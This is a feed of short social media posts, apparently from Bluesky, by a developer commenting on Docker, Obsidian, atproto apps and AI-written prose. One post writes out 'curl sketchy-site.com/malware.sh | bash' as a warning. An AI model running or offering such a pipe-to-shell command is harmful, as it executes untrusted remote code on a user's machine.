Sounds like a skill issue, Claude.
Sounds like a skill issue, Claude.
I did not have “tech giant does the right thing for once” on my 2026 bingo card, but here we are.
So, I guess Python’s pretty cool. Between Python and shell scripts, seems like there isn’t much that can’t be automated.
Remember kids, always check your work. And when it comes to LLMs, check the work three times.
“write code with your fingers” is such a wonderful expression.
Except that’s not true polymeter, is it? Time signature is 4/3, and the rhythm is 1–2–and—3; the notes are not of equal length.
Still, kudos getting the song stuck in my head. I’ll be singing this for the rest of the day.
Nothing quite like getting excited about running a variant-based, multi-architecture Docker build, only to be shut down by a fucking typo.
Did you know you can create toggleable Docker builds? I did not. I learned this today, and I think I have found a new favorite feature. This is so fucking cool.
I dunno, if I had concerns that a protocol I liked was concentrated too much around one company, I'd work with the existing community of people working hard to distribute that network as quickly as possible instead of just writing a blog post telling people nothing can be done
TIL Don’t make everything a TODO if you want to be able to dial down into your comments for existing and unresolved TODOs.
I’ve spent the better part of this afternoon rewriting frontmatter and converting “TODOs” lists to “Tasks” across an entire Obsidian vault.
And this is one of many 😫😭
I hate that if I write out a thread but decline to post, I have to copy everything over or else lose it all because the drafts feature might as well be non-existent.
How disappointing.
I want to run my own PDS server, but hosting shit costs money.
This might be the most hilarious thing I’ll read all week. And it’s Sunday.
😂
i get why some people crosspost to multiple apps but it's so weird when you never open the app or engage with the replies here it's like a shitty hologram or something
When you see white smoke, that's a sign the lexicons have been chosen
Gotta remember to run the nuke script while in a devcontainer so I don’t have 18 million files in node_modules to dump when I empty the trash.
Thank you. I shall look into this.
Threads has their notes feature, in which you can embed a note in a post to overcome the post character limit. I think it would be awesome if we could embed a @leaflet.pub post in a Bluesky in similar fashion. You can read the whole post in-feed, or click a link to take you to the full post.
I just downloaded and started using @getskyscraper.com for Bluesky, and wow is that app beautiful. Not to throw shade on any other app—I love what everyone is building over atproto—but this has to be the best looking app I’ve discovered as an alternative to the main Bluesky app.
How compelling. I’m interested to learn more. Where is a good place to start? Mind you, I’m an atproto n00b when it comes to dev.
it’s the everything app
Hi @tangled.org! Your site could use a search function. I would love to explore OSS projects there.
“Just push to prod. It’ll be fine. Probably.”
Listen, I know you might want to, but running
curl sketchy-site.com/malware.sh | bash
is a bad idea.
I wrote this at 3am after I decided to write instead of struggling to fall asleep, so if it seems like it rambles a bit, that's why. I'm just trying to write more.
@tangled.org can you update the login so that if I’m browsing a project and then log in, I’m returned to that project and not the homepage?
Tried reading a think piece about OSS and was put off by the writing style. I don’t “know” it was AI, but it was def AI.
Just because you can doesn’t mean you should. AI does not a good blog post make. If you’re going to write anything, do it with your fucking soul.
